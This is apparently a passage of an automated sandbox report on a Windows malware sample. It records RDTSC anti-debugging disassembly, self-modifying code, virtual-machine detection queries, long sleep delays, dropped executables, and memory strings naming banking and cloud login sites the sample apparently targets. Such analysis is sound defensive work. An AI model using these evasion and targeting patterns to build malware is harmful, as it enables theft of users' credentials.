                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030119 second address: 5030158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 call 00007FD908C4C6F4h 0x0000000e jmp 00007FD908C4C6F2h 0x00000013 pop eax 0x00000014 mov dx, 5786h 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov si, dx 0x00000020 mov eax, edi 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030158 second address: 5030184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD9092ECB37h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5030184 second address: 50301F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD908C4C6EFh 0x00000009 and eax, 77890C1Eh 0x0000000f jmp 00007FD908C4C6F9h 0x00000014 popfd 0x00000015 mov edi, ecx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov ch, 66h 0x0000001f call 00007FD908C4C6F5h 0x00000024 jmp 00007FD908C4C6F0h 0x00000029 pop eax 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD908C4C6ECh 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090C0A second address: 5090C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090C10 second address: 5090C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD908C4C6EDh 0x00000011 xor si, 6016h 0x00000016 jmp 00007FD908C4C6F1h 0x0000001b popfd 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FD908C4C6F1h 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 call 00007FD908C4C6ECh 0x0000002a mov ch, BBh 0x0000002c pop edi 0x0000002d jmp 00007FD908C4C6ECh 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 jmp 00007FD908C4C6F0h 0x0000003a push dword ptr [ebp+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090C98 second address: 5090CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD9092ECB33h 0x0000000a adc esi, 55F3140Eh 0x00000010 jmp 00007FD9092ECB39h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090CD1 second address: 5090D17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD908C4C6F3h 0x00000015 jmp 00007FD908C4C6F3h 0x0000001a popfd 0x0000001b mov ch, 34h 0x0000001d popad 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090D17 second address: 5090D59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 37B91DE9h 0x0000000e jmp 00007FD9092ECB31h 0x00000013 xor dword ptr [esp], 37B81DEBh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD9092ECB2Dh 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090D7B second address: 5090D93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090D93 second address: 5090D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090D97 second address: 5090D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5090D9D second address: 5090DC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD9092ECB37h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C826D second address: 11C827B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040794 second address: 50407E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FD9092ECB2Bh 0x0000000f push FFFFFFFEh 0x00000011 pushad 0x00000012 mov edx, eax 0x00000014 call 00007FD9092ECB30h 0x00000019 push eax 0x0000001a pop edi 0x0000001b pop esi 0x0000001c popad 0x0000001d call 00007FD9092ECB29h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD9092ECB38h 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50407E5 second address: 5040848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD908C4C6F1h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD908C4C6F1h 0x0000000f sub ch, FFFFFFE6h 0x00000012 jmp 00007FD908C4C6F1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007FD908C4C6F1h 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD908C4C6ECh 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040848 second address: 504088A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FD9092ECB35h 0x00000014 add eax, 46C0F856h 0x0000001a jmp 00007FD9092ECB31h 0x0000001f popfd 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 504088A second address: 50408FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, 531Dh 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FD908C4C6F3h 0x00000014 pop eax 0x00000015 pushad 0x00000016 mov eax, 60732DCBh 0x0000001b pushfd 0x0000001c jmp 00007FD908C4C6F0h 0x00000021 sbb ecx, 423DACD8h 0x00000027 jmp 00007FD908C4C6EBh 0x0000002c popfd 0x0000002d popad 0x0000002e call 00007FD908C4C6E9h 0x00000033 jmp 00007FD908C4C6F6h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50408FD second address: 5040901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040901 second address: 504091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50409FB second address: 5040A2D instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bh 0x00000008 popad 0x00000009 nop 0x0000000a jmp 00007FD9092ECB2Ch 0x0000000f sub esp, 1Ch 0x00000012 jmp 00007FD9092ECB30h 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d push edi 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A2D second address: 5040A67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD908C4C6EBh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD908C4C6F5h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A67 second address: 5040A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD9092ECB2Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A77 second address: 5040A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A86 second address: 5040A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A8A second address: 5040A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040A90 second address: 5040AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d call 00007FD9092ECB2Eh 0x00000012 jmp 00007FD9092ECB32h 0x00000017 pop ecx 0x00000018 mov di, 8E56h 0x0000001c popad 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD9092ECB34h 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040AE7 second address: 5040AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD908C4C6EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040AF6 second address: 5040B2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d mov eax, 52D18933h 0x00000012 mov edi, ecx 0x00000014 popad 0x00000015 mov eax, dword ptr [7743B370h] 0x0000001a pushad 0x0000001b mov ah, 97h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B2A second address: 5040B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xor dword ptr [ebp-08h], eax 0x00000009 jmp 00007FD908C4C6F5h 0x0000000e xor eax, ebp 0x00000010 pushad 0x00000011 mov ecx, edi 0x00000013 mov cl, bh 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FD908C4C6F0h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD908C4C6EEh 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B72 second address: 5040B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B78 second address: 5040B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040B7C second address: 5040BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9092ECB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FD9092ECB2Eh 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 pushad 0x00000015 movzx esi, di 0x00000018 mov bh, F2h 0x0000001a popad 0x0000001b mov dword ptr fs:[00000000h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD9092ECB31h 0x00000028 rdtsc
                          Tries to evade debugger and weak emulator (self modifying code)
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 101C19A instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11E5B61 instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 101EE11 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 67C19A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 845B61 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 67EE11 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeSpecial instruction interceptor: First address: 1002A3A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeSpecial instruction interceptor: First address: 11CA948 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeSpecial instruction interceptor: First address: 122A9B1 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05090C6E rdtsc 0_2_05090C6E
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4817
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2744
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5388
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1101
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeAPI coverage: 7.8 %
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5336Thread sleep time: -58029s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5088Thread sleep count: 35 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5088Thread sleep time: -70035s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6188Thread sleep count: 330 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6188Thread sleep time: -9900000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5092Thread sleep time: -58029s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4972Thread sleep count: 35 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4972Thread sleep time: -70035s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3872Thread sleep count: 35 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3872Thread sleep time: -70035s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1764Thread sleep time: -180000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6188Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe TID: 7024Thread sleep time: -120000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe TID: 6468Thread sleep time: -90000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -3689348814741908s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep count: 5388 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep count: 1101 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4508Thread sleep count: 43 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep time: -2767011611056431s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2672Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DA36A9 FindFirstFileExW,8_2_00DA36A9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 8_2_00DA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00DA375A
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00DA36A9 FindFirstFileExW,10_2_00DA36A9
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00DA375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00DA375A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                          Source: file.exe, 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.2117496625.000000000119B000.00000080.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000000.2148680482.00000000007FB000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000000.2162876849.00000000007FB000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000000.2804508854.00000000007FB000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmp, 1459165c97.exe, 0000002A.00000002.3344580195.0000000001183000.00000040.00000001.01000000.00000010.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: 1459165c97.exe, 0000002A.00000002.3345671635.0000000003527000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIDevSymbol!
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: skotes.exe, 00000006.00000002.3384635500.0000000001089000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000002.3380643533.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, 5639a58f3b.exe, 0000000A.00000003.3057320495.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000002.3381728843.000000000122C000.00000004.00000020.00020000.00000000.sdmp, 850609077b.exe, 0000000D.00000002.3381728843.0000000001260000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.3209344034.00000000011E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: skotes.exe, 00000006.00000002.3384635500.00000000010BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: 850609077b.exe, 0000000D.00000003.3360294285.0000000003A6A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: PING.EXE, 00000029.00000002.3239211770.000001FE7E0BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: 850609077b.exe, 0000000D.00000003.3360687749.0000000003B2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
